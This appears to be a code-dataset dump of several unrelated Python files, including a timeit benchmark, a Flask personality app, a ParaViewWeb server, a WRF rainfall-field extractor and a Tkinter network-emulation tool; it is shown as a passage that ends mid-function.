blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b8deb2b9dbb51c31d7e0bd2d422a20c182cb5525
|
a34745efeb435a93309fb789b6bf03c031a5c820
|
/compchallenge2b.py
|
f634c6885e1ef4b0b0cfcb1e62472d1af9e93340
|
[] |
no_license
|
brunoreyes/python_fundamentals
|
5e87358a10f674e5a049aa4c5ae6a0108cd72a8e
|
9fa2b341a5b5c954a6a1a77aa36ee6ef9fe70daa
|
refs/heads/master
| 2023-01-20T23:32:49.772268
| 2020-11-17T04:51:10
| 2020-11-17T04:51:10
| 302,809,977
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,835
|
py
|
import timeit
# timeit is good for comparing the speeds of multiple lines of code rather than finding the exact speed
# "setup" is preferably way to give timeit access to global variables
# garbage collection
# By default, timeit() temporarily turns off garbage collection during the timing.
# The advantage of this approach is that it makes independent timings more comparable.
setup = """\
gc.enable()
locations = {0: "You are sitting in front of a computer learning Python",
1: "You are standing at the end of a road before a small brick building",
2: "You are at the top of a hill",
3: "You are inside a building, a well house for a small stream",
4: "You are in a valley beside a stream",
5: "You are in the forest"}
exits = {0: {"Q": 0},
1: {"W": 2, "E": 3, "N": 5, "S": 4, "Q": 0},
2: {"N": 5, "Q": 0},
3: {"W": 1, "Q": 0},
4: {"N": 1, "W": 2, "Q": 0},
5: {"W": 2, "S": 1, "Q": 0}}
"""
locations = {0: "You are sitting in front of a computer learning Python",
1: "You are standing at the end of a road before a small brick building",
2: "You are at the top of a hill",
3: "You are inside a building, a well house for a small stream",
4: "You are in a valley beside a stream",
5: "You are in the forest"}
exits = {0: {"Q": 0},
1: {"W": 2, "E": 3, "N": 5, "S": 4, "Q": 0},
2: {"N": 5, "Q": 0},
3: {"W": 1, "Q": 0},
4: {"N": 1, "W": 2, "Q": 0},
5: {"W": 2, "S": 1, "Q": 0}}
# print("nested for loops")
# print("----------------")
# nested_loop = """\
def nested_loop():
result= []
for loc in sorted(locations):
exits_to_destination_1 = []
for xit in exits:
if loc in exits[xit].values():
exits_to_destination_1.append((xit, locations[xit]))
result.append(exits_to_destination_1)
# print the result before returning
for x in result:
pass # recall pass doesn't do anything but is necessary to make a for loop valid
return result
# print("Locations leading to {}".format(loc), end='\t')
# print(exits_to_destination_1)
# """
print()
# print("List comprehension inside a for loop")
# print("------------------------------------")
# loop_comp = """\
def loop_comp():
result = []
for loc in sorted(locations):
exits_to_destination_2 = [(xit, locations[xit]) for xit in exits if loc in exits[xit].values()]
result.append(exits_to_destination_2)
# print the result before returning
for x in result:
pass
return result
# print("Locations leading to {}".format(loc), end='\t')
# print(exits_to_destination_2)
# """
# print()
# print("nested comprehension")
# print("--------------------")
# nested_comp = """\
def nested_comp():
exits_to_destination_3 = [[(xit, locations[xit]) for xit in exits if loc in exits[xit].values()]
for loc in sorted(locations)]
# print the result before returning
for x in exits_to_destination_3:
pass
return exits_to_destination_3
# print(exits_to_destination_3)
# print()
# for index, loc in enumerate(exits_to_destination_3):
# print("Locations leading to {}".format(index), end='\t')
# print(loc)
# """
def nested_gen():
exits_to_destination_3 = ([(xit, locations[xit]) for xit in exits if loc in exits[xit].values()]
for loc in sorted(locations))
# print the result before returning
for x in exits_to_destination_3:
pass
return exits_to_destination_3
# result_1 = timeit.timeit(nested_loop, globals=globals(), number=1000) # globals allows anything defined in module
# to be available to this snipet, default number is 1,000,000,000 so for timesake we decreased it to 1000
print(nested_loop())
print(loop_comp())
print(nested_comp())
print(nested_gen())
result_1 = timeit.timeit(nested_loop, setup, number=1000) # preferable way to add code using "setup"
result_2 = timeit.timeit(loop_comp, setup, number=1000)
result_3 = timeit.timeit(nested_comp, setup, number=1000)
result_4 = timeit.timeit(nested_gen, setup, number=1000)
# apply common sense rather than statistics
print("Nested loop:\t{}".format(result_1))
print("Loop composition:\t{}".format(result_2)) # loop composition is the fastest
print("Nested composition:\t{}".format(result_3))
print("Nested generator:\t{}".format(result_4)) # the nested generator is the fastest
# because it is not building the list but just iterating over it and returning each line
# the generator is faster
# speed or memory use, list comprehensions lack speed but are effiecent in memory
|
[
"bruno619reyes@gmail.com"
] |
bruno619reyes@gmail.com
|
d4ad983bb64d5751121ab96f0b31f78bdb862868
|
b544a6d23a19f19a5a4ba41f3e002dc6666ec220
|
/tyche/route/__init__.py
|
1b2bd234a0a622503b44f05816266b86b76b1e58
|
[] |
no_license
|
EternalZing/Tyche-Server
|
2429b7a0cf952ae972f8f2de0ac085220984968a
|
b29b4fd3b5aea23127f3198c464e3c6421ae9c96
|
refs/heads/master
| 2021-05-05T12:56:09.266103
| 2018-02-08T07:55:36
| 2018-02-08T07:55:36
| 118,345,047
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26
|
py
|
from .rules_r import rule
|
[
"445625470@qq.com"
] |
445625470@qq.com
|
1a978bc0c5339f155784d67e949cf1b613a17034
|
112b6fbda45328775cde667d084f7c4a2c5898bf
|
/app.py
|
9a3521caf6c87e0927ff12566f8c63d9f210161a
|
[] |
no_license
|
jenienam/Online-Personality-App
|
5a93fe37075198bf73cdb70f45dac43ed97a8125
|
1d913f4d9e6bc00beb358153b3f91234cd0176da
|
refs/heads/master
| 2022-12-16T05:27:19.138811
| 2020-09-17T07:17:11
| 2020-09-17T07:17:11
| 287,020,047
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,432
|
py
|
# Dependencies
import numpy as np
from flask import Flask, request, render_template
import requests
from web_scraper import redditScraper, twitterScraper
from data_cleaning import calculateModelParameters
from model import personalityTypeResult
app = Flask(__name__)
@app.route('/')
def home():
return (render_template('index.html'))
@app.route('/reddit',methods = ['POST', 'GET'])
def predict_reddit():
if request.method == 'POST':
username = request.form['reddit-username']
comments = redditScraper(username)
scores = calculateModelParameters(comments)
personality = personalityTypeResult(comments)
return (render_template('result.html', username=username, comments=comments, scores=scores, personality=personality))
@app.route('/twitter',methods = ['POST', 'GET'])
def predict_twitter():
if request.method == 'POST':
username = request.form['twitter-username']
comments = twitterScraper(username)
scores = calculateModelParameters(comments)
personality = personalityTypeResult(comments)
return (render_template('result.html', username=username, comments=comments, scores=scores, personality=personality))
@app.route('/data')
def data():
return (render_template('data.html'))
@app.route('/about')
def about():
return (render_template('about.html'))
if __name__ == "__main__":
app.run(debug=True)
|
[
"jenien@uci.edu"
] |
jenien@uci.edu
|
015c735e062ac63dde157d1b06e700b8009e14ce
|
8a1241ac8ad91672aec81c878f2165a7678a1ad6
|
/Web/Applications/Visualizer/server/pv_web_visualizer.py
|
84ef98ae22d8c269ffca4d47cdd4e0a31d3dd2f0
|
[
"MIT",
"LicenseRef-scancode-paraview-1.2",
"Apache-2.0",
"LicenseRef-scancode-protobuf",
"BSD-3-Clause"
] |
permissive
|
lmynsberge/ParaView
|
d9fbd0f4da197bc96172be8697ced76fe73852bf
|
2a68ee496949becf499742dfdbecb41b1eda81a7
|
refs/heads/master
| 2021-01-22T16:18:25.241194
| 2013-11-11T15:01:02
| 2013-11-11T15:01:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,203
|
py
|
r"""
This module is a ParaViewWeb server application.
The following command line illustrate how to use it::
$ pvpython .../pv_web_visualizer.py --data-dir /.../path-to-your-data-directory
--data-dir is used to list that directory on the server and let the client choose a file to load.
--load-file try to load the file relative to data-dir if any.
--ds-host None
Host name where pvserver has been started
--ds-port 11111
Port number to use to connect to pvserver
--rs-host None
Host name where renderserver has been started
--rs-port 22222
Port number to use to connect to the renderserver
Any ParaViewWeb executable script come with a set of standard arguments that
can be overriden if need be::
--port 8080
Port number on which the HTTP server will listen to.
--content /path-to-web-content/
Directory that you want to server as static web content.
By default, this variable is empty which mean that we rely on another server
to deliver the static content and the current process only focus on the
WebSocket connectivity of clients.
--authKey vtkweb-secret
Secret key that should be provided by the client to allow it to make any
WebSocket communication. The client will assume if none is given that the
server expect "vtkweb-secret" as secret key.
"""
# import to process args
import os
# import paraview modules.
from paraview.web import wamp as pv_wamp
from paraview.web import protocols as pv_protocols
from vtk.web import server
try:
import argparse
except ImportError:
# since Python 2.6 and earlier don't have argparse, we simply provide
# the source for the same as _argparse and we use it instead.
import _argparse as argparse
# =============================================================================
# Create custom Pipeline Manager class to handle clients requests
# =============================================================================
class _PipelineManager(pv_wamp.PVServerProtocol):
dataDir = None
authKey = "vtkweb-secret"
dsHost = None
dsPort = 11111
rsHost = None
rsPort = 11111
fileToLoad = None
def initialize(self):
# Bring used components
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStartupRemoteConnection(_PipelineManager.dsHost, _PipelineManager.dsPort, _PipelineManager.rsHost, _PipelineManager.rsPort))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStateLoader(_PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebPipelineManager(_PipelineManager.dataDir, _PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebRemoteConnection())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileManager(_PipelineManager.dataDir))
# Update authentication key to use
self.updateSecret(_PipelineManager.authKey)
# =============================================================================
# Main: Parse args and start server
# =============================================================================
if __name__ == "__main__":
# Create argument parser
parser = argparse.ArgumentParser(description="ParaView/Web Pipeline Manager web-application")
# Add default arguments
server.add_arguments(parser)
# Add local arguments
parser.add_argument("--data-dir", default=os.getcwd(), help="path to data directory to list", dest="path")
parser.add_argument("--load-file", default=None, help="File to load if any based on data-dir base path", dest="file")
parser.add_argument("--ds-host", default=None, help="Hostname to connect to for DataServer", dest="dsHost")
parser.add_argument("--ds-port", default=11111, type=int, help="Port number to connect to for DataServer", dest="dsPort")
parser.add_argument("--rs-host", default=None, help="Hostname to connect to for RenderServer", dest="rsHost")
parser.add_argument("--rs-port", default=11111, type=int, help="Port number to connect to for RenderServer", dest="rsPort")
# Exctract arguments
args = parser.parse_args()
# Configure our current application
_PipelineManager.authKey = args.authKey
_PipelineManager.dataDir = args.path
_PipelineManager.dsHost = args.dsHost
_PipelineManager.dsPort = args.dsPort
_PipelineManager.rsHost = args.rsHost
_PipelineManager.rsPort = args.rsPort
if args.file:
_PipelineManager.fileToLoad = args.path + '/' + args.file
# Start server
server.start_webserver(options=args, protocol=_PipelineManager)
|
[
"sebastien.jourdain@kitware.com"
] |
sebastien.jourdain@kitware.com
|
205e2c6f3f8e1f3fd358d21e4ccbb1da32701a93
|
021a3dff055d4b3e40aafc63f0029dc280466233
|
/db_scripts/curw_fcst/rfield/gen_rfield_kelani_basin_parallelized_optimized.py
|
e2bed1eb35b657a3592bea9d212fe72a3c8b6482
|
[] |
no_license
|
shadhini/curw_helpers
|
45efe90d887c702b3a3f5877163647e220d230e4
|
101d896f8b589b478ef146b5b4dd99ec24f2dc84
|
refs/heads/master
| 2021-07-03T02:53:13.398052
| 2020-10-28T03:39:58
| 2020-10-28T03:39:58
| 185,217,580
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,854
|
py
|
#!/home/uwcc-admin/curw_rfield_extractor/venv/bin/python3
import traceback
import pymysql
import json
import getopt
import sys
import os
import re
import multiprocessing as mp
from datetime import datetime, timedelta
# connection params
HOST = ""
USER = ""
PASSWORD = ""
DB =""
PORT = ""
VALID_MODELS = ["WRF_A", "WRF_C", "WRF_E", "WRF_SE"]
VALID_VERSIONS = ["v3", "v4", "4.0"]
SIM_TAGS = ["evening_18hrs"]
root_directory = '/var/www/html'
bucket_root = '/mnt/disks/wrf_nfs'
def read_attribute_from_config_file(attribute, config):
"""
:param attribute: key name of the config json file
:param config: loaded json file
:return:
"""
if attribute in config and (config[attribute]!=""):
return config[attribute]
else:
print("{} not specified in config file.".format(attribute))
exit(1)
def write_to_file(file_name, data):
with open(file_name, 'w+') as f:
f.write('\n'.join(data))
def create_rfield(connection, wrf_model, version, sim_tag, timestamp):
# rfield = [['latitude', 'longitude', 'rainfall']]
rfield = []
with connection.cursor() as cursor0:
cursor0.callproc('get_d03_rfield_kelani_basin_rainfall', (wrf_model, version, sim_tag, timestamp))
results = cursor0.fetchall()
for result in results:
rfield.append('{}'.format(result.get('value')))
write_to_file('{}/wrf/{}/{}/rfield/kelani_basin/{}_{}_{}_rfield.txt'
.format(root_directory, version, sim_tag, wrf_model, version, timestamp.strftime('%Y-%m-%d_%H-%M')), rfield)
#############################
# Raw WRF RFIELD GENERATION #
#############################
def gen_rfield_d03_kelani_basin(wrf_model, version, sim_tag):
# remove outdated rfields
try:
os.system("sudo rm {}/wrf/{}/{}/rfield/kelani_basin/{}_{}_*".format(root_directory, version, sim_tag, wrf_model, version))
except Exception as e:
traceback.print_exc()
start_time = ''
end_time = ''
now = datetime.strptime((datetime.now()+timedelta(hours=5, minutes=30)).strftime('%Y-%m-%d 00:00:00'), '%Y-%m-%d %H:%M:%S')
try:
# Connect to the database
connection = pymysql.connect(host=HOST, user=USER, password=PASSWORD, db=DB,
cursorclass=pymysql.cursors.DictCursor)
# Extract timeseries start time and end time
with connection.cursor() as cursor1:
cursor1.callproc('get_TS_start_end', (wrf_model, version, sim_tag))
result = cursor1.fetchone()
start_time = result.get('start')
end_time = result.get('end')
if end_time > (now + timedelta(days=1)):
# Extract rfields
timestamp = start_time
while timestamp <= end_time:
create_rfield(connection=connection, wrf_model=wrf_model, version=version, sim_tag=sim_tag,
timestamp=timestamp)
timestamp = datetime.strptime(str(timestamp), '%Y-%m-%d %H:%M:%S') + timedelta(minutes=15)
return True
except Exception as ex:
traceback.print_exc()
return False
finally:
connection.close()
print("Process finished")
def usage():
usageText = """
Usage: python gen_rfield_kelani_basin_parallelized_optimized_with_past_future.py -m WRF_X1,WRF_X2,WRF_X3 -v vX -s "evening_18hrs"
-h --help Show usage
-m --wrf_model List of WRF models (e.g. WRF_A, WRF_E). Compulsory arg
-v --version WRF model version (e.g. v4, v3). Compulsory arg
-s --sim_tag Simulation tag (e.g. evening_18hrs). Compulsory arg
"""
print(usageText)
if __name__=="__main__":
my_pool = None
try:
wrf_models = None
version = None
sim_tag = None
try:
opts, args = getopt.getopt(sys.argv[1:], "h:m:v:s:",
["help", "wrf_model=", "version=", "sim_tag="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-m", "--wrf_model"):
wrf_models = arg.strip()
elif opt in ("-v", "--version"):
version = arg.strip()
elif opt in ("-s", "--sim_tag"):
sim_tag = arg.strip()
print(wrf_models, version, sim_tag)
print(VALID_MODELS, VALID_VERSIONS, SIM_TAGS)
# load connection parameters
config = json.loads(open('/home/uwcc-admin/curw_rfield_extractor/db_config.json').read())
# connection params
HOST = read_attribute_from_config_file('host', config)
USER = read_attribute_from_config_file('user', config)
PASSWORD = read_attribute_from_config_file('password', config)
DB = read_attribute_from_config_file('db', config)
PORT = read_attribute_from_config_file('port', config)
wrf_model_list = wrf_models.split(',')
for wrf_model in wrf_model_list:
if wrf_model is None or wrf_model not in VALID_MODELS:
usage()
exit(1)
if version is None or version not in VALID_VERSIONS:
usage()
exit(1)
if sim_tag is None or sim_tag not in SIM_TAGS:
usage()
exit(1)
rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(root_directory, version, sim_tag)
try:
os.makedirs(rfield_home)
except FileExistsError:
# directory already exists
pass
gfs_data_hour =re.findall(r'\d+', sim_tag)[0]
bucket_rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(bucket_root, version, gfs_data_hour)
try:
os.makedirs(bucket_rfield_home)
except FileExistsError:
# directory already exists
pass
# copy file containing xy coordinates to the rfield home
try:
os.system("cp kelani_basin_xy.csv {}/xy.csv".format(rfield_home))
except Exception:
pass
mp_pool = mp.Pool(mp.cpu_count())
results = mp_pool.starmap(gen_rfield_d03_kelani_basin,
[(wrf_model, version, sim_tag) for wrf_model in wrf_model_list])
# results = mp_pool.starmap_async(gen_rfield_d03_kelani_basin,
# [(wrf_model, version, sim_tag) for wrf_model in wrf_model_list]).get()
print("results: ", results)
except Exception as e:
print('JSON config data loading error.')
traceback.print_exc()
finally:
if my_pool is not None:
mp_pool.close()
os.system("tar -czvf {}/rfield.tar.gz {}/*".format(bucket_rfield_home, rfield_home))
|
[
"jshadhiniaseka@gmail.com"
] |
jshadhiniaseka@gmail.com
|
68ecfff4ba3f11e8600cdf732af4fbb73db1d9a6
|
e07fc6fb419c1ce0616478ae1a59f9d70e353984
|
/src/hqmanager/parser.py
|
0db9f6249ad53d892fa9f580b66afaa49bef0d56
|
[
"MIT"
] |
permissive
|
herqles-io/hq-manager
|
9e647bf874411279cb47f162c0c2049f984ce6c5
|
ec4a37760a7d0a52128b66eb264eb25998c6a9d1
|
refs/heads/master
| 2021-01-23T08:38:32.203593
| 2015-08-11T18:50:42
| 2015-08-11T18:50:42
| 40,308,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 343
|
py
|
import argparse
import hqmanager
description = """Some description here"""
epilog = """Some epilog here"""
parser = argparse.ArgumentParser(
description=description,
epilog=epilog)
parser.add_argument('-c', '--config', required=True, help='Config file to use')
parser.set_defaults(func=hqmanager.main)
# args = parser.parse_args()
|
[
"rbelgrave@covermymeds.com"
] |
rbelgrave@covermymeds.com
|
1cc46aac55864041c24fc7764d0bacccf6e6b983
|
c5ccca7b5af562e10c91a4dfe451da0990e73edf
|
/Test2-1/users/migrations/0006_auto_20200402_1057.py
|
e21fdce120ed0f09058b2ad3cd83f4ed31c5a5a0
|
[] |
no_license
|
170400529/zwj
|
ac29e788d47f0c1381527bbc101711c656d29e29
|
66257a8028fefb9a016e0dc04b99c9d2daed07ee
|
refs/heads/master
| 2021-05-20T20:25:30.200353
| 2020-04-02T09:05:49
| 2020-04-02T09:05:49
| 252,406,215
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
# Generated by Django 3.0.4 on 2020-04-02 02:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0005_auto_20200402_1056'),
]
operations = [
migrations.AlterField(
model_name='question',
name='level',
field=models.CharField(choices=[('1', 'easy'), ('3', 'difficult'), ('2', 'general')], max_length=10, null=True, verbose_name='等级'),
),
]
|
[
"2583145870@qq.com"
] |
2583145870@qq.com
|
e40f1eef29e7514039f8878f249ee57807933519
|
a1d986433707e5a645347921f0b941176319ec15
|
/venv/bin/easy_install
|
6f048b0a8a3450324440a6e904b07daf6a076319
|
[] |
no_license
|
ezanat1/WineML
|
edba7ffe3d0353144f5f769e20e75af79b0ea234
|
7f77c70d0da9660ce60b9f5f94796b452024c870
|
refs/heads/master
| 2020-05-16T23:13:37.708689
| 2018-12-07T01:26:10
| 2018-12-07T01:26:10
| 183,357,538
| 1
| 0
| null | 2019-04-25T04:40:53
| 2019-04-25T04:40:52
| null |
UTF-8
|
Python
| false
| false
| 281
|
#!/Users/ezanatesfaye/Desktop/WineRecommendation/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ezanatesfaye@Ezanas-MacBook-Pro.local"
] |
ezanatesfaye@Ezanas-MacBook-Pro.local
|
|
bd9e112b5ba6b811a80a6b9ccc5271dbdd0cc491
|
907ea8b2e3af5035ee640c95c646d6a04a192d41
|
/TTools/TTools.py
|
43b91782b12f7b6b5ed03dfe17eae3ca57566dd8
|
[] |
no_license
|
cuchy/TTools
|
8869ee47d3c489d95fa2c8b454757aee521cd705
|
37527c5a60360f0ddef7398a34296ab332810e0c
|
refs/heads/master
| 2021-01-11T10:39:05.100786
| 2016-11-05T21:25:29
| 2016-11-05T21:25:29
| 72,948,537
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,785
|
py
|
#!/usr/bin/python
# -*- coding: iso-8859-1 -*-
# "========================================================================="
# " UDELAR - Facultad de Ingeniería "
# " Proyecto de Grado - Año 2016 "
# " Autores: Viviana Solla & Gabriel Jambrina "
# "========================================================================="
import Tkinter,tkFileDialog,ttk
import os
import sys
import ttkcalendar
class simpleapp_tk(Tkinter.Tk):
def __init__(self,parent):
Tkinter.Tk.__init__(self,parent)
self.parent = parent
self.initialize()
def initialize(self):
self.grid()
self.eval('tk::PlaceWindow %s center' % self.winfo_pathname(self.winfo_id()))
button1 = Tkinter.Button(self,text="Convertir archvio GML a XML",font=('times', 14, 'bold'), command=self.OnButtonClickB1)
button1.grid(column=0,row=1,columnspan=1,sticky='EW')
button2 = Tkinter.Button(self,text="Preparar emulación de Red", font=('times', 14, 'bold') , command=self.OnButtonClickB2)
button2.grid(column=0,row=2,columnspan=1,sticky='EW')
button3 = Tkinter.Button(self,text="Cargar Base de Datos Mysql",font=('times', 14, 'bold'), command=self.OnButtonClickB3)
button3.grid(column=0,row=3,columnspan=1,sticky='EW')
button4 = Tkinter.Button(self,text="Borrar archivos generados por bgpdump",font=('times', 14, 'bold'), command=self.OnButtonClickB4)
button4.grid(column=0,row=4,columnspan=1,sticky='EW')
button5 = Tkinter.Button(self,text="Ejecutar MiniNExt",font=('times', 14, 'bold'), command=self.OnButtonClickB5)
button5.grid(column=0,row=5,columnspan=1,sticky='EW')
button6 = Tkinter.Button(self,text="Descargar trazas BGP",font=('times', 14, 'bold'), command=self.OnButtonClickB6)
button6.grid(column=0,row=6,columnspan=1,sticky='EW')
self.image = Tkinter.PhotoImage(file="img/exit.png")
button6 = Tkinter.Button(self, text="SALIR",font=('times', 14, 'bold'), image=self.image, anchor=Tkinter.SE, compound="right", command=quit)
button6.grid(column=0,row=7, sticky='EW')
self.labelVariable = Tkinter.StringVar()
self.label = Tkinter.Label(self,textvariable=self.labelVariable,anchor="w",fg="white",bg="green")
self.label.grid(column=0,row=10,columnspan=2,sticky='EW')
self.labelVariable.set(" TTools v1.0")
self.grid_columnconfigure(0,weight=1)
self.resizable(True,False)
##################BOTON B1###########################
def OnButtonClickB1(self):
self.labelVariable.set(" Convertidor de GML a XML" )
file = tkFileDialog.askopenfile(parent=self,mode='rb',title='Selecciona el archivo a convertir')
if file != None:
self.root = Tkinter.Tk()
self.root.eval('tk::PlaceWindow %s center' % self.root.winfo_pathname(self.root.winfo_id()))
self.root.title("Numero de Sistema Autónomo")
print "¡File OK!"
self.abs_path = os.path.abspath(file.name)
#dirActual = os.getcwd()
Tkinter.Label(self.root, text="Ingrese el número de AS", font=('arial', 12, 'bold'), width=30).pack(pady=10)
self.e = Tkinter.Entry(self.root, width=10)
self.e.pack(pady=10)
b = Tkinter.Button(self.root, text="OK",font=('times', 12, 'bold'), command=self.onClickB1)
b.pack(pady=20)
def onClickB1(self):
os.system("python GMLtoXMLconverter.py "+self.abs_path+" "+self.e.get())
print "ASN= ", self.e.get()
self.root.destroy()
self.labelVariable.set("Archivo convertido con exito")
##################BOTON B2###########################
def OnButtonClickB2(self):
self.routersName = []
self.lstASN = []
self.labelVariable.set(" Generador de archivos de configuracion" )
file = tkFileDialog.askopenfile(parent=self,mode='rb',title='Seleccione el archivo XML que representa la topología')
if file != None:
self.root = Tkinter.Tk()
self.root.eval('tk::PlaceWindow %s center' % self.root.winfo_pathname(self.root.winfo_id()))
#self.root.resizable(width=False, height=False)
self.root.grid()
self.root.title("Seleccion routers de borde")
print "¡File OK!"
self.abs_path = os.path.abspath(file.name) #os.path.basename(file.name)
#Leo los routers de AS
linea = file.readline()
while not ("<topology>" in linea):
linea = file.readline()
while not ("</nodes>" in linea):
if ("<node id=" in linea):
auxLinea = linea.split("\"")
r = auxLinea[1]
r = '_'.join(r.split())
if not r in self.routersName:
self.routersName.append(r)
linea = file.readline()
#Muestro la lista con los routers
self.label1 = Tkinter.Label(self.root,text= "Selecciones los routers que mantienen sesiones eBGP",height=2, width=55,font=('arial', 12, 'bold'));self.label1.pack()
self.s1 = Tkinter.Scrollbar(self.root)
self.s2 = Tkinter.Scrollbar(self.root)
self.L1 = Tkinter.Listbox(self.root, height=20, font=('arial', 11))
self.L2 = Tkinter.Listbox(self.root, height=20)
self.s1.pack(side=Tkinter.LEFT, fill=Tkinter.Y)
self.s2.pack(side=Tkinter.RIGHT, fill=Tkinter.Y)
self.L1.pack(side=Tkinter.LEFT, fill=Tkinter.Y)
self.L2.pack(side=Tkinter.RIGHT, fill=Tkinter.Y)
self.s1.config(command=self.L1.yview)
self.s2.config(command=self.L2.yview)
self.L1.config(yscrollcommand=self.s1.set)
self.L2.config(yscrollcommand=self.s2.set)
for i in self.routersName:
self.L1.insert(Tkinter.END, i)
self.L1.select_set(0)
self.b3 = Tkinter.Button(self.root, text="Seleccionar =>", command=self.onClickB3, height=2, width=10, bg="green", font=('arial', 12));self.b3.pack()
self.b4 = Tkinter.Button(self.root, text="<= Quitar", command=self.onClickB4, height=2, width=10, bg="red", font=('arial', 12));self.b4.pack()
self.b2 = Tkinter.Button(self.root, text="Siguiente", command=self.onClickB2, height=2, width=10, font=('times', 12));self.b2.pack(side="bottom")
def onClickB3(self):
index = int(self.L1.curselection()[0])
self.L2.insert(Tkinter.END, self.routersName[index])
self.L2.select_set(self.L2.size()-1)
def onClickB4(self):
index = self.L2.curselection()[0]
self.L2.delete(index)
self.L2.select_set(self.L2.size()-1)
def onClickB2(self):
self.L1.pack_forget();self.s1.pack_forget();self.L2.pack_forget();self.s2.pack_forget();self.b2.pack_forget();self.b3.pack_forget();
self.b4.pack_forget();self.label1.pack_forget();
self.root.title("ASN de Vecinos eBGP")
self.label2 = Tkinter.Label(self.root,height=2,width=30,font=('arial', 15, 'bold'),text=self.L2.get(0, Tkinter.END)[0],anchor=Tkinter.CENTER);self.label2.pack()
self.e = Tkinter.Entry(self.root, font=("Calibri",12),justify="center",width=8,bg="#1E6FBA")
self.asn=65000
self.e.insert(Tkinter.END, self.asn); self.e.pack()
self.index=1;
self.b5 = Tkinter.Button(self.root, height=1, width=8, text="Siguiente", command=self.onClickB5, font=('arial', 12));self.b5.pack(pady=10)
def onClickB5(self):
self.asn+=10
self.lstASN.insert(self.index-1,self.e.get())
self.e.delete(0, Tkinter.END); self.e.insert(Tkinter.END, self.asn)
self.label2.config(text=self.L2.get(0, Tkinter.END)[self.index] )
self.index+=1
if (self.L2.size() == self.index):
self.b5.pack_forget()
self.b6 = Tkinter.Button(self.root, height=1, width=8, text="Terminar", command=self.onClickB6, font=('arial', 12)); self.b6.pack(pady=10)
def onClickB6(self):
self.lstASN.insert(self.index-1,self.e.get())
comando="python emulGen.py "+self.abs_path+" "
counter=0
for i in self.L2.get(0, Tkinter.END):
counter+=1
if (counter==self.index):
comando+=i+" "
else:
comando+=i+","
counter=0
for i in self.lstASN :
counter+=1
if (counter==self.index):
comando+=i+" "
else:
comando+=i+","
counter=0;
os.system(comando)
#print comando
self.root.destroy()
self.labelVariable.set(" Topology Tools v1.0")
#####################BOTON B3#########################
def OnButtonClickB3(self):
self.labelVariable.set("Cargar bases de datos Mysql" )
self.directory = tkFileDialog.askdirectory(parent=self,title='Seleccione la ubicacion de la carpeta mininext')
if self.directory != "":
self.root = Tkinter.Tk()
self.root.eval('tk::PlaceWindow %s center' % self.root.winfo_pathname(self.root.winfo_id()))
self.root.title("Nobre de la base de datos")
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11, 'bold'), text="Ingresee el nombre de la base").pack()
self.baseName = Tkinter.Entry(self.root, width=20)
self.baseName.pack(padx=50)
Tkinter.Label(self.root, height=2,width=30,font=('arial', 11, 'bold'), text="Selecione el algoritmo utilizado").pack()
self.L3 = Tkinter.Listbox(self.root, height=10)
self.L3.pack()
self.algorithm=["FM","RR_Sep", "RR_SepD", "RR_SepS", "RR_Bates", "RR_BatesY", "RR_BatesZ", "RR_Zhang"]
self.L3.insert(Tkinter.END, self.algorithm[0]);self.L3.insert(Tkinter.END, self.algorithm[1]);self.L3.insert(Tkinter.END, self.algorithm[2]);
self.L3.insert(Tkinter.END, self.algorithm[3]); self.L3.insert(Tkinter.END, self.algorithm[4]);self.L3.insert(Tkinter.END, self.algorithm[5]);
self.L3.insert(Tkinter.END, self.algorithm[6]); self.L3.insert(Tkinter.END, self.algorithm[7])
self.L3.select_set(0)
Tkinter.Button(self.root, text="Cargar BD", command=self.onClickB7, font=('arial', 12)).pack()
def onClickB7(self):
if self.baseName.get() != "" :
print "Cargar base"
